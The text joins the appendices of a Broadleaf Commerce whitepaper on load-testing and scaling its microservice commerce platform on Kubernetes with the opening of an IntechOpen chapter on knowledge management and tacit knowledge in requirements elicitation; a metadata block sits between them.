<tr> <td>Token API</td> <td>20%</td> </tr> <tr> <td>Add To Card API</td> <td>10%</td> </tr> <tr> <td>Guest Token API</td> <td>6%</td> </tr> <tr> <td>Contact Info API</td> <td>6%</td> </tr> <tr> <td>Fulfillment Options API</td> <td>6%</td> </tr> <tr> <td>Fulfillment Group API</td> <td>6%</td> </tr> <tr> <td>Customers API</td> <td>5%</td> </tr> <tr> <td>Customers Stored Addresses API</td> <td>5%</td> </tr> <tr> <td>Customers Stored Payments API</td> <td>5%</td> </tr> <tr> <td>Payments API</td> <td>3%</td> </tr> <tr> <td>Checkout API</td> <td>3%</td> </tr> </tbody> </table> Order Focused Test Plan (100%) - Product API - Product Details API - Marketing Message API - Menu Footer API - Client Discovery API - Menu Header API - Cart API - Price Lists API - Add To Card API - Guest Token API - Contact Info API - Fulfillment Group API - Fulfillment Options API - Payments API - Checkout API Additional Considerations Impacting Multiple Factors - Menu Footer API - Client Discovery API - Menu Header API - Cart API - Price Lists API # Appendix B - Throughput Reference <table> <thead> <tr> <th>Type</th> <th>Label</th> <th>TPS</th> <th>OPS</th> <th>Node Specs</th> <th>Theme</th> </tr> </thead> <tbody> <tr> <td>(M)in</td> <td>S1</td> <td>20</td> <td>0.01</td> <td>1 - 4Core</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S3</td> <td>277</td> <td>0.20</td> <td>3 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S4</td> <td>458</td> <td>0.36</td> <td>4 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S5</td> <td>640</td> <td>0.60</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M3</td> <td>1057</td> <td>0.81</td> <td>3 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>2000</td> <td>1.40</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(G)ranular</td> <td>L3</td> <td>1900</td> <td>1.50</td> <td>3 - 16Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L3</td> <td>2121</td> <td>1.65</td> <td>3 - 16Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L5</td> <td>3400</td> <td>2.50</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(G)ranular</td> <td>L5</td> <td>3400</td> <td>2.50</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S5</td> <td>289</td> <td>0.99</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 14% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>1092</td> <td>3.35</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 14% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L5</td> <td>2389</td> <td>7.73</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 14% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>791</td> <td>4.16</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 25% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L5</td> <td>1864</td> <td>9.21</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 25% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S5</td> <td>550</td> <td>0.60</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion, Discounts</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>1700</td> <td>1.20</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion, Discounts</td> </tr> </tbody> </table> ## Appendix B - Throughput Reference <table> <thead> <tr> <th>Type</th> <th>Label</th> <th>TPS</th> <th>OPS</th> <th>Node Specs</th> <th>Theme</th> </tr> </thead> <tbody> <tr> <td>(B)aligned</td> <td>L5</td> <td>3000</td> <td>2.40</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion, Discounts</td> </tr> <tr> <td>(B)aligned</td> <td>S5</td> <td>640</td> <td>0.60</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion, Product Options</td> </tr> <tr> <td>(B)aligned</td> <td>M5</td> <td>1900</td> <td>1.40</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion, Product Options</td> </tr> <tr> <td>(B)aligned</td> <td>L5</td> <td>3300</td> <td>2.40</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion, Product Options</td> </tr> <tr> <td>(B)aligned</td> <td>M5</td> <td>498</td> <td>4.33</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 50% Conversion</td> </tr> <tr> <td>(B)aligned</td> <td>L5</td> <td>1594</td> <td>13.83</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 50% Conversion</td> </tr> <tr> <td>(B)aligned</td> <td>M5</td> <td>420</td> <td>19.00</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion</td> </tr> <tr> <td>(B)aligned</td> <td>L5</td> <td>1040</td> <td>48.00</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion</td> </tr> <tr> <td>(B)aligned</td> <td>L6-M8-S4</td> <td>2100</td> <td>99.00</td> <td>6 - 16Core, 8 - 8Core, 4 - 4Core, 16 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion</td> </tr> <tr> <td>(B)aligned</td> <td>M5</td> <td>420</td> <td>19.00</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, Large Catalog</td> </tr> <tr> <td>(B)aligned</td> <td>L5</td> <td>1020</td> <td>46.00</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, Large Catalog</td> </tr> <tr> <td>(B)aligned</td> <td>M5</td> <td>420</td> <td>19.00</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, XL Catalog</td> </tr> <tr> <td>(B)aligned</td> <td>L5</td> <td>980</td> <td>45.00</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, XL Catalog</td> </tr> </tbody> </table> Appendix C - Approach We use a custom JMeter rigging exposed via a web-interface delivered by a Spring Boot application. The rigging is deployed in a specific test node pool that is maintained separately from the main application node pool. In some circumstances, multiple node pools were used for the application pods. This latter case occurred when it was advantageous to segregate pods by type (e.g. a node pool dedicated to replicas of the Browse type). The primary vehicle for attaining this level of separation was to utilize node tainting and toleration configurations to force scheduling segregation. To minimize cost, Terraform was configured to provision preemptible nodes. Helm Charts were used to deploy the application and support components to the kubernetes cluster. Shell scripts were used to interact with Terraform and Helm to automate the construction, installation, uninstallation, and destruction of the cluster. The overall goal was to minimize cluster uptime to reduce expense. Monitoring system health at all levels was important during test runs. Distributed systems are complex with many moving parts, each contributing to system health and performance. We leveraged separate Grafana dashboards for JMeter (Figure 1) results and system health (Figure 2). Visualizations in both dashboards can evidence system stress and are useful for determination of where to scale resources and/or capacity. The system health dashboard is the same standard dashboard that ships with the framework. Appendix C - Approach Figure 1 - JMeter Dashboard Total Requests | Failed Requests | Received Bytes | Sent Bytes | Error Rate % --- | --- | --- | --- | --- 366304 Requests | 0 Failed | 1 GiB | 621 MiB | 0% Summary Response Times (90th pct) API Response Times (90th pct) - Product Summary: 278.68 ms - Checkout Summary: 230.90 ms - Shipping Information Summary: 160.70 ms - Checkout API: 354.70 ms - Simple Add To Cart API: 140.48 ms - Guest Token API: 107.90 ms - Fulfillment Group API: 106.00 ms - Contact Info API: 105.80 ms - Payments API: 83.60 ms - Product Details API: 81.00 ms Appendix C - Approach Figure 2 - System Health Dashboard Cluster - Broadleaf CPU - Node 1: 77.1% - Node 2: 63.8% - Node 3: 58.0% - Node 4: 24.9% - Node 5: 23.0% - Node 6: 12.0% Application | Demo Browse | Instance 10.76.1.15:10000 Pod - Broadleaf CPU Usage - System Current: 60.54% - Process Current: 24.87% GC Pause Durations - Avg end of minor GC (GC0) Evacuation Pause: 150 ms - Avg end of minor GC (GC0) Humongous Allo: 100 ms - Avg end of minor GC (Metadata GC Thresh): 50 ms - Max end of minor GC (GC0) Evacuation Pause: 100 ms Threads - Live Max: 270, Current: 270 - New Max: 50, Current: 0 - Runnable Max: 65, Current: 65 - Terminated Max: 0, Current: 0 Thread States - Blocked Max: 0, Current: 0 - New Max: 0, Current: 0 - Runnable Max: 65, Current: 65 - Terminated Max: 0, Current: 0 JVM Heap - Current: 290 MB - Committed: 518 MB - Max: 1.46 GB JVM Non-Heap - Current: 345 MB - Committed: 354 MB - Max: 1.19 GB Rate - 25 ops/s - 20 ops/s - 15 ops/s - 10 ops/s - 5 ops/s - 0 ops/s Duration - 40 ms - 30 ms - 20 ms - 10 ms - 0 ms Errors - 0 ops/s - 2 ops/s - 1 ops/s - 0 ops/s - 0 ops/s Connection Pool Size - 15 - 10 Total Acquire Time - 3 ms - 2.5 ms - 2 ms - 1.5 ms Total Usage Time - 125 ms - 100 ms - 75 ms - 50 ms Appendix D - Components Core Components • Microservices - Provides the core application functionality • Auth - Provides OAuth related security functionality • Gateway - Proxy exposed to the client and routes traffic to a microservice • Database - Data persistence layer for the application • Kafka - Messaging broker for the application • Solr - Search services for the application • Zookeeper - Distributed synchronization for Solr and Kafka • EFK Stack - APM and centralized log management • Prometheus - Time series database for system health metrics • Grafana - System health telemetry Testing Components • JMeter - Distributed load test client • InfluxDB - Time series database for load test results - See Figure 3 for deployment diagram Granular Microservices Asset, Catalog, Campaign, Offer, Pricing, Vendor, Catalog Browse, Menu, Personalization, Inventory, Cart, Order, Customer, Cart Operations, Order Operations, Import, Scheduled Job, Admin Navigation, Admin User, Sandbox, Metadata, Tenant, Notification, Search, Indexer # Appendix D - Components ## Balanced FlexPackage™ Contents <table> <thead> <tr> <th>Type</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>Browse</td> <td>Asset, Catalog, Campaign, Offer, Pricing, Vendor, Catalog Browse, Menu, Personalization</td> </tr> <tr> <td>Cart</td> <td>Inventory, Cart, Order, Customer, Cart Operations, Order Operations</td> </tr> <tr> <td>Processing</td> <td>Import, Inventory, Scheduled Job, Catalog, Campaign, Offer, Pricing, Customer, Order, Menu, Personalization, Indexer</td> </tr> <tr> <td>Supporting</td> <td>Admin Navigation, Admin User, Sandbox, Metadata, Tenant, Notification, Search</td> </tr> </tbody> </table> ## Min FlexPackage™ Contents <table> <thead> <tr> <th>Type</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>Min</td> <td>Asset, Catalog, Campaign, Offer, Pricing, Vendor, Catalog Browse, Menu, Personalization, Inventory, Cart, Order, Customer, Cart Operations, Order Operations, Import, Scheduled Job, Admin Navigation, Admin User, Sandbox, Metadata, Tenant, Notification, Search</td> </tr> </tbody> </table> *There is some redundancy in microservices located in Processing. Processing handles longer lifecycle tasks from the admin and scheduled jobs. That work is isolated here, protecting the utilization of Browse and Cart for customer-facing traffic. Appendix D - Components Figure 3 - Sample Deployment Diagram (Observability components not depicted) **Appendix E - Sample Kubernetes Deployment Plans** **BM5 at Browse Heavy 3% Conversion Test** (Other components not shown) <table> <thead> <tr> <th>Type</th> <th>Replicas</th> <th>Cores Requested (m)</th> <th>Memory Requested (Mi)</th> </tr> </thead> <tbody> <tr> <td>Auth</td> <td>2</td> <td>800</td> <td>1000</td> </tr> <tr> <td>Browse</td> <td>3</td> <td>2000</td> <td>2000</td> </tr> <tr> <td>Cart</td> <td>2</td> <td>2000</td> <td>2000</td> </tr> <tr> <td>Processing</td> <td>3</td> <td>700</td> <td>2000</td> </tr> <tr> <td>Supporting</td> <td>3</td> <td>700</td> <td>2000</td> </tr> <tr> <td>Gateway</td> <td>5</td> <td>1200</td> <td>500</td> </tr> </tbody> </table> **BL5 at Browse Heavy 3% Conversion Test** (Other components not shown) <table> <thead> <tr> <th>Type</th> <th>Replicas</th> <th>Cores Requested (m)</th> <th>Memory Requested (Mi)</th> </tr> </thead> <tbody> <tr> <td>Auth</td> <td>5</td> <td>1600</td> <td>1000</td> </tr> <tr> <td>Browse</td> <td>10</td> <td>2200</td> <td>2000</td> </tr> <tr> <td>Cart</td> <td>10</td> <td>1600</td> <td>2000</td> </tr> <tr> <td>Processing</td> <td>5</td> <td>1300</td> <td>2000</td> </tr> <tr> <td>Supporting</td> <td>5</td> <td>1300</td> <td>2000</td> </tr> <tr> <td>Gateway</td> <td>10</td> <td>1000</td> <td>500</td> </tr> </tbody> </table> **BL6-M8-S4 at Order Focused 100% Conversion Test** (Other components not shown) <table> <thead> <tr> <th>Type</th> <th>Replicas</th> <th>Cores Requested (m)</th> <th>Memory Requested (Mi)</th> </tr> </thead> <tbody> <tr> <td>Auth</td> <td>10</td> <td>1400</td> <td>1000</td> </tr> <tr> <td>Browse</td> <td>14</td> <td>2000</td> <td>2000</td> </tr> <tr> <td>Cart</td> <td>20</td> <td>3000</td> <td>2000</td> </tr> <tr> <td>Processing</td> <td>10</td> <td>1400</td> <td>2000</td> </tr> <tr> <td>Supporting</td> <td>10</td> <td>1400</td> <td>2000</td> </tr> <tr> <td>Gateway</td> <td>14</td> <td>1000</td> <td>500</td> </tr> </tbody> </table> Appendix F - Technical Recommendations It’s worthy to note the kubernetes scheduler on its own does a fair job of organizing pods based on the defined resource requests. However, often you will require more control over how pods are scheduled. Kubernetes provides several advanced configuration mechanisms that should definitely be included in your toolbelt when designing a deployment for your cluster. Specifically, node tainting, toleration, and affinity configurations are invaluable to customizing the deployment to achieve the most efficient and performant installation. We made extensive use of these features during the testing performed in this paper. If your scale requirements are large enough, it will begin to make sense to segregate pods by type into different node pools. This type of configuration is most clearly evidenced in our BL6-M8-S4 configuration that was used to achieve 100 OPS. The performance of the system will be most sensitive to adjustments in CPU core request configuration. The system performs well at smaller sizes for smaller throughput requirements. However, the most efficient sizing when using the balanced FlexPackage™ utilizes cart pod replicas sized at 3000m and browse pod replicas sized at 2000m. Consider these sizes as you explore larger nodes and you have more opportunity to request larger CPU allocations. When starting a load test, it can be advantageous to use liberal node size and not define pod resource constraints. Then, run load and review kubectl top pod results to see where resources are naturally allocated. Armed with that information as a guideline, setup pod resource requests and limits for future test runs. Add replica count until you reach your throughput goals. Such an approach can take out some of the guesswork when starting to design a load test. Built with the future in mind, Broadleaf Commerce is an enterprise software provider with a proven track record of solving complex commerce challenges. Our API-first approach, and cloud-native microservice architecture gives you the control, flexibility, and performance to innovate quicker and achieve time to value faster. As the market-leading choice for enterprise organizations requiring tailored, highly scalable commerce systems, we deliver a modular platform that embraces an open philosophy with an extensible and intuitive administrative console. Broadleaf Commerce was founded in 2009. Over the years, we have earned the trust of leading brands like - O’Reilly Auto Parts, Major League Baseball, ICON Fitness, and Telefonica. broadleafcommerce.com
{"Source-Url": "https://d1ophd2rlqbanb.cloudfront.net/2021/sponsors/broadleaf-scalability-whitepaper.pdf", "len_cl100k_base": 10045, "olmocr-version": "0.1.53", "pdf-total-pages": 36, "total-fallback-pages": 0, "total-input-tokens": 52656, "total-output-tokens": 10597, "length": "2e13", "weborganizer": {"__label__adult": 0.00031948089599609375, "__label__art_design": 0.0005030632019042969, "__label__crime_law": 0.00031495094299316406, "__label__education_jobs": 0.0006966590881347656, "__label__entertainment": 8.678436279296875e-05, "__label__fashion_beauty": 0.00015628337860107422, "__label__finance_business": 0.006168365478515625, "__label__food_dining": 0.0003075599670410156, "__label__games": 0.0005936622619628906, "__label__hardware": 0.00238800048828125, "__label__health": 0.0002872943878173828, "__label__history": 0.00020241737365722656, "__label__home_hobbies": 0.0001373291015625, "__label__industrial": 0.0007252693176269531, "__label__literature": 0.00017249584197998047, "__label__politics": 0.0001786947250366211, "__label__religion": 0.00023615360260009768, "__label__science_tech": 0.02960205078125, "__label__social_life": 6.449222564697266e-05, "__label__software": 0.047393798828125, "__label__software_dev": 0.90869140625, "__label__sports_fitness": 0.0001800060272216797, "__label__transportation": 0.000530242919921875, "__label__travel": 0.00020802021026611328}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40357, 0.05995]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40357, 0.02408]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40357, 0.88477]], "google_gemma-3-12b-it_contains_pii": [[0, 149, false], [149, 920, null], [920, 1281, null], [1281, 2466, null], [2466, 2575, null], [2575, 3793, null], [3793, 5732, null], [5732, 5920, null], [5920, 7663, null], [7663, 8542, null], [8542, 9813, null], [9813, 10406, null], [10406, 11101, null], [11101, 11961, null], [11961, 12116, null], [12116, 14195, null], [14195, 15809, null], [15809, 17247, null], [17247, 19000, null], [19000, 21140, null], [21140, 22886, null], [22886, 23027, null], [23027, 23989, null], [23989, 24000, null], [24000, 25667, null], [25667, 27669, null], [27669, 29479, null], [29479, 30992, null], [30992, 31582, null], [31582, 32841, null], [32841, 33881, null], [33881, 35707, null], [35707, 35809, null], [35809, 37772, null], [37772, 39596, null], [39596, 40357, null]], "google_gemma-3-12b-it_is_public_document": [[0, 149, true], [149, 920, null], [920, 1281, null], [1281, 2466, null], [2466, 2575, null], [2575, 3793, null], [3793, 5732, null], [5732, 5920, null], [5920, 7663, null], [7663, 8542, null], [8542, 9813, null], [9813, 10406, null], [10406, 11101, null], [11101, 11961, null], [11961, 12116, null], [12116, 14195, null], [14195, 15809, null], [15809, 17247, null], [17247, 19000, null], [19000, 21140, null], [21140, 22886, null], [22886, 23027, null], [23027, 23989, null], [23989, 24000, null], [24000, 25667, null], [25667, 27669, null], [27669, 29479, null], [29479, 30992, null], [30992, 31582, null], [31582, 32841, null], [32841, 33881, null], [33881, 35707, null], [35707, 35809, null], [35809, 37772, null], [37772, 39596, null], [39596, 40357, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40357, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40357, null]], "pdf_page_numbers": [[0, 149, 1], [149, 920, 2], [920, 1281, 3], [1281, 2466, 4], [2466, 2575, 5], [2575, 3793, 6], [3793, 5732, 7], [5732, 5920, 8], [5920, 7663, 9], [7663, 8542, 10], [8542, 9813, 11], [9813, 10406, 12], [10406, 11101, 13], [11101, 11961, 14], [11961, 12116, 15], [12116, 14195, 16], [14195, 15809, 17], [15809, 17247, 18], [17247, 19000, 19], [19000, 21140, 20], [21140, 22886, 21], [22886, 23027, 22], [23027, 23989, 23], [23989, 24000, 24], [24000, 25667, 25], [25667, 27669, 26], [27669, 29479, 27], [29479, 30992, 28], [30992, 31582, 29], [31582, 32841, 30], [32841, 33881, 31], [33881, 35707, 32], [35707, 35809, 33], [35809, 37772, 34], [37772, 39596, 35], [39596, 40357, 36]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40357, 0.26302]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
3f05c50de6f828fab3f23fc2185e5b5310be77ad
We are IntechOpen, the world’s leading publisher of Open Access books Built by scientists, for scientists 5,000 Open access books available 125,000 International authors and editors 140M Downloads 154 Countries delivered to TOP 1% Our authors are among the most cited scientists 12.2% Contributors from top 500 universities WEB OF SCIENCE™ Selection of our books indexed in the Book Citation Index in Web of Science™ Core Collection (BKCI) Interested in publishing with us? Contact book.department@intechopen.com Numbers displayed above are based on latest data collected. For more information visit www.intechopen.com Knowledge Management for Informally Structured Domains: Challenges and Proposals Karla Olmos-Sánchez and Jorge Rodas-Osollo Abstract Eliciting requirements of products or solutions in informally structured domains is a highly creative and complex activity due to the inherent characteristics of these domains, such as the great quantities of tacit knowledge used by domain specialists, the dynamic interaction between domain specialists and their environment in order to solve problems, the necessity of these solutions of products to be developed by teams of specialists and the asymmetry of knowledge between domain specialists and requirements engineers. The knowledge management discipline promotes an integrated approach in order to face these challenges; therefore, a strategy for addressing requirements elicitation that incorporates techniques and methods of this discipline has been proposed as a serious approach to deal with those challenges. The valuable results of the application of the strategy in real cases prove empirical insights about its utility. Keywords: knowledge management, informally structured domains, requirements elicitation, tacit knowledge, knowledge creation spiral 1. Introduction Requirements elicitation (RE) is a valuable process for the identification of solution requirements according to the need of clients of users [1]. In this chapter, the concept of solutions includes products, such as software systems or intangible solutions, such as data analysis. According to several authors, application domain knowledge is essential to obtain the correct and appropriate requirements. The application domain is an area where a solution is or will be used. Consequently, requirements engineers must understand, as soon as possible, the structure, the processes and the restrictions of a domain in which they are generally... neophytes. This knowledge belongs to domain specialists, any person possessing application domain knowledge and/or having a role in the domain. Therefore, requirements engineers must elicit the application domain knowledge from domain specialists in order to include it into a set of solution requirements. It is a complex and highly creative activity that involves intensive cognitive activities, especially when the application domain has a high degree of informality where knowledge is informally stated, partially complete, implicitly assumed, tacit and unstructured [2]. This phenomenon is presented in many disciplines such as intelligent tailored solutions for ill-structured domains, software for complex domains, intelligent tutoring systems, knowledge based systems, industrial design, among others. In general, every necessity that requires a complex, highly creative solution, in which the requirements engineers are not a part of the application domain and need eliciting sufficient high-quality knowledge to understand the clients’ need and expectations, faces this challenge [2]. Therefore, instead of focusing on the challenges of developing a requirements elicitation proposal for each of these complex areas, we have expanded the vision and generalized these domains as informally structured domains (ISD) [3], which is widely explained in Section 2. In addition, solutions in ISD usually respond to clients and users’ specific needs. As a result, they are diverse, consensus and unverifiable, and there are not fully defined processes to develop them. Therefore, these solutions or products must be developed according to the experience of domain specialists. These characteristics hamper the requirements elicitation process because the implications of knowledge transfer and transformation, the appropriate management of tacit knowledge and the issues of knowledge exchange must be considered. In this context, we assume that a perspective of requirements elicitation that emphasizes the importance of knowledge management (KM) is a useful approach for addressing ISD inherent problems. KM is a discipline with the aim of enhancing an organization by sharing and managing knowledge flow among the people, taking advantage of information technologies [4]. Regarding KM in requirements elicitation is not new, but only few efforts offer a full knowledge management perspective [5]. The knowledge management strategy for requirements engineering (KMoS-RE©) [6] is a high-level plan oriented to the transfer or transformation of knowledge. The strategy has the aim of eliciting, structuring and creating knowledge that can be incorporated into a specification closest to the needs and expectations of clients. It is especially design from a full KM perspective in order to be applied in the context of ISD. The goal of this chapter is to describe the challenges of ISD and make a critical analysis of the KMoS-RE© strategy as a serious requirements elicitation proposal to face them. The analysis is based on the experience of applying the strategy in several ISD real cases. According the valuable results, the KMoS-RE© strategy promises to be a useful tool in the requirements elicitation of solution or products, especially in disciplines that share ISD characteristics [8]. The remainder of this chapter is organized as follows: Section 2 presents a characterization of ISD in order to explain the challenges of eliciting requirements in these domains. This section also includes a wide explanation of tacit knowledge. Section 3 describes fundamental concepts of KM in requirements elicitation. Section 4 discusses the utilization of KMoS-RE© as a serial proposal to face the challenges in ISD. Finally, in Section 5, the conclusions and future works are presented. 2. Informally structured domains 2.1. Tacit knowledge As discussed above, a key element in a successful requirements elicitation process in ISD is knowledge. But, what is knowledge? Despite the widely recognised importance of knowledge as the main asset in today’s society, defining it is an unresolved issue. In order to establish a baseline, this work supports the idea that knowledge has a subjective and personal quality. This view is based on the traditional definition of knowledge as justified true belief. However, as in Ref. [9], the focus is on the justified rather than the true aspect of belief. The justified view of knowledge makes it as dynamic, context-specific, humanistic, deeply rooted in individuals' value system and created in social interactions among individuals as opposed to the true view in which knowledge is absolute, static and non-human. According to Ryle, knowledge can be classified in knowing-that and knowing-how. Knowing-that means storing and recalling facts. Knowing-how is a practical knowledge. This distinction carries through Polanyi’s theory of personal knowledge, which classifies knowledge in explicit and tacit [10]. Explicit knowledge is transmitted through any language or formal representation: from text written in natural language to complex formalism as ontologies. On the other hand, tacit knowledge is personal and context-specific, generated by experience and therefore difficult to communicate and formalize. Polanyi was interested in ‘… to show that complete objectivity, as usually attributed to the exact science, is a delusion and is in fact a false idea’. Thus, he examined how individuals gain and share knowledge. He concluded that knowledge is highly personal and questioned the commonly held view of the dispassionate objective scientist. He also emphasized that people can often know how to do things without either consciously knowing, or being able to articulate to others why what they do works. According to Polanyi, tacitness is something personal, usually abilities or skills that people use to solve a problem or to do something valuable. Tacitness depends on people’s experiences and learning. Polanyi suggested that all knowledge has a tacit component and discussed the process of how the tacit cooperates with the explicit. He also argued that language is a vital tool that people use to share knowledge, and that with the appropriate use of it, much, but not all, of this knowledge can be transmitted among individuals who share a mutually agreed language. When tacitness predominates, this articulation is not possible. However, it does not prevent knowledge from being transmitted by other means, such as observation or task repetition. This is what people do when learning to ride a bicycle or when an art master transfers knowledge to his or her apprentices. We should keep in mind that Polanyi’s theory was generated in the field of psychology and his work was addressed towards perception. Thus, from Polanyi’s perspective, any attempt to convert tacit knowledge to explicit will be unfruitful because it cannot be articulated at all. Grant [11] provides a graphical representation of knowledge degradation as it is expressed by Polanyi’s work (Figure 1). The bar represents how the knowledge is flowing in a continuum between tacit and explicit. The continuum ranges from knowledge inherently tacit to knowledge that can be easily expressed by words. The knowledge that can be expressed by words ranges from explicit to experts to explicit to most people. The knowledge explicit to experts requires specialized language. Most of this knowledge is also implicit, i.e. knowledge that can be expressed by words, but that for some reason it has not made explicit. The tacit knowledge ranges from ineffable to highly personal. Much of this knowledge is related to the use of instruments, such as playing piano or using a specialized machine. To Gourlay [12], Polanyi’s work has been misunderstood. He argued that some tacit knowledge does become amenable to analysis and decomposition, allowing recording it in an explicit form. Likewise, tacit knowledge in requirements elicitation has been misused. For example, Janik [12] has identified that the concept of tacit knowledge is used in two ways: 1. Concerning to knowledge that can be expressed, but for some reasons, it remains hidden. Janik identified three reasons why knowledge tends to remain tacit: (1) concern for secrecy and power, (2) because no one has bothered to recognize it or tried to explain it and (3) because it concerns presuppositions, we all generally hold. These situations can be aware, as the first one, or unaware, as the second and third ones. However, there are non-insuperable barriers to make this knowledge explicit. 2. Concerning to knowledge gained through familiarity and practice, which is inexpressible in words, or knowledge gained by perception as sight, smell or know-how. A wine taster or identifying an instrument when listening to a sound, are some examples of this knowledge. What is really important in requirements elicitation is making the most possible quantity of knowledge explicit. Whether it is tacit, implicit or that for some reason remains hidden, even because nobody asks. Figure 1. Granularity of knowledge. The problem of tacit knowledge in requirements elicitation is not new. Goguen [13] did an extensive analysis of the term from a social perspective. He analysed several methods to elicit requirements such as introspection, questionnaires, interviews, focus group and even protocol analysis. He argued that these methods have limitations to manage tacit knowledge. To Goguen, it is indispensable considering a social perspective to attend this problem; thus, he suggests using combinations of these methods besides including discourse, conversations and interactions analysis. Later, Nuseibeh [14] emphasized the importance of tacit knowledge and how it may affect the requirements of elicitation process. For him, the responses of the domain specialists to direct questions about their domain of expertise do not reflect, neither their current behaviour nor the reality, for the large amounts of tacit knowledge that is handled by them. Thus, product developers or solution solvers should consider theoretical and practical techniques of cognitive psychology, anthropology, sociology and linguistics to have better results. The importance of sharing tacit knowledge to improve the problem-solving processes or as a strategy to gain competitive advantage in organizations is undeniable. For example, Wyatt [15] argues that much of the medical progress in modern times has been attributed to an evolution from tacit to explicit knowledge. Despite that, nowadays, tacit knowledge remains as an ambiguous and inconsistent concept. We are aware that not all knowledge of specialists is susceptible to becoming explicit; however, it is essential trying this transformation with a well-founded strategy for the requirements as close as possible to the reality of the application domain. ### 2.2. Formality and informality Intuitively, a domain is a well-defined area of human activity with formal and informal issues in which a universe of discourse occurs. According to Webster’s Dictionary, ‘formal’ means definite, orderly and methodical. In computer science, to be formal does not necessarily require the use of formal logic, or even mathematics, but the use of a formal notation to represent system models. Everything that computers do is formal because the syntactic structures in a program are manipulated according to well-defined rules [13]. In domains with a significant social context, much of the information is embedded in the social world of domain specialists; it is informal (not susceptible to be formalized or not yet formalized) and depends on the context for its interpretation [16]. These kinds of domains share characteristics such as informally defined concepts and lack of absolute verification of the processes; therefore, the domains specialists should use a great quantity of tacit knowledge to solve everyday situations. Every domain is susceptible to be formalized to a certain level, but there will always be issues that remain informal. If a domain is mainly formal, the domain specialists can build, in a relative easy way, formal structures to solve problems. On the other hand, if a domain is mainly informal, it does not mean that domain specialists cannot build a structure; definitely they do. In some way, it is possible to solve diagnostic or design problems; however, these structures are informal, i.e. they depend on the context and the domain specialists’ experience and knowledge. When informal characteristics prevail, the process and effort to solve problems can be extremely costly and time consuming. Nguyen and Shanks [17] describe requirements elicitation as an ill-structured problem due to its openness, its context poorly understood and the existence of multiple domains. For Nguyen, solving problems in requirements elicitation requires a complex and dynamic social interaction between domain specialists and developers. The knowledge of both actors evolves as the project advances: the domain specialists get involved with software-solution and the developers with the organizational 